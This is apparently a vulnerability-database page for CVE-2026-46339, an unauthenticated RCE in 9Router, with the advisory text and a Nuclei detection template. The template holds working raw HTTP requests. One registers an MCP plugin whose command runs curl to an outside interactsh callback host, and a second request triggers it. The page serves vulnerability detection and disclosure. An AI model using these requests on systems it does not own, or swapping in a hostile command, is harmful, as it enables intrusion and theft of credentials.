9Router <= 0.4.36 - Unauthenticated RCE
CVE-2026-46339
Early Release
Description
9Router <= 0.4.36 middleware only guards 8 explicitly listed routes, leaving /api/cli-tools/* and /api/mcp/* entirely unauthenticated. An attacker can POST to /api/cli-tools/cowork-settings to register a custom MCP plugin with attacker-controlled command and args stored verbatim into globalThis, then GET /api/mcp/{name}/sse to trigger spawn() with the stored command resulting in unauthenticated remote code execution.
Severity
Critical
CVSS Score
10
Affected Product
9router
Published Date
July 14, 2026
Template Author
0x_akoko
CVE-2026-46339.yaml
id: CVE-2026-46339
info:
name: 9Router <= 0.4.36 - Unauthenticated RCE
author: 0x_Akoko
severity: critical
description: |
9Router <= 0.4.36 middleware only guards 8 explicitly listed routes, leaving /api/cli-tools/* and /api/mcp/* entirely unauthenticated. An attacker can POST to /api/cli-tools/cowork-settings to register a custom MCP plugin with attacker-controlled command and args stored verbatim into globalThis, then GET /api/mcp/{name}/sse to trigger spawn() with the stored command resulting in unauthenticated remote code execution.
impact: |
Full unauthenticated RCE as the 9Router process user, exposing API keys, Claude tokens, AWS credentials, and all stored MCP plugin configuration.
remediation: |
Upgrade to 9Router 0.4.37 or later.
reference:
- https://github.com/decolua/9router/security/advisories/GHSA-fhh6-4qxv-rpqj
- https://nvd.nist.gov/vuln/detail/CVE-2026-46339
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2026-46339
cwe-id: CWE-78
metadata:
verified: true
max-request: 3
product: 9router
vendor: decolua
tags: cve,cve2026,9router,rce,mcp,unauth,critical
variables:
plugin_name: "{{randstr}}"
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
GET /api/version HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "currentVersion")'
condition: and
internal: true
- raw:
- |
POST /api/cli-tools/cowork-settings HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"baseUrl":"x","apiKey":"x","models":["x"],"plugins":[],"localPlugins":[],"customPlugins":[{"name":"{{plugin_name}}","command":"curl","args":["-s","{{interactsh-url}}"]}]}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "success")'
condition: and
internal: true
- raw:
- |
GET /api/mcp/{{plugin_name}}/sse HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "http")'
condition: and
# digest: 490a0046304402204a442cae7e67809cdb01f3c277a1889e4a37e774ada90ccc27d3d2031bf18b450220488071e0b8d6511ea25d33a953403d5751a70a27931e4cff0d98287d3925eb1a:922c64590222798bb761d5b6d8e7295010.0Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE ID:
cve-2026-46339
CWE ID:
cwe-78
Remediation Steps
Upgrade to 9Router 0.4.37 or later.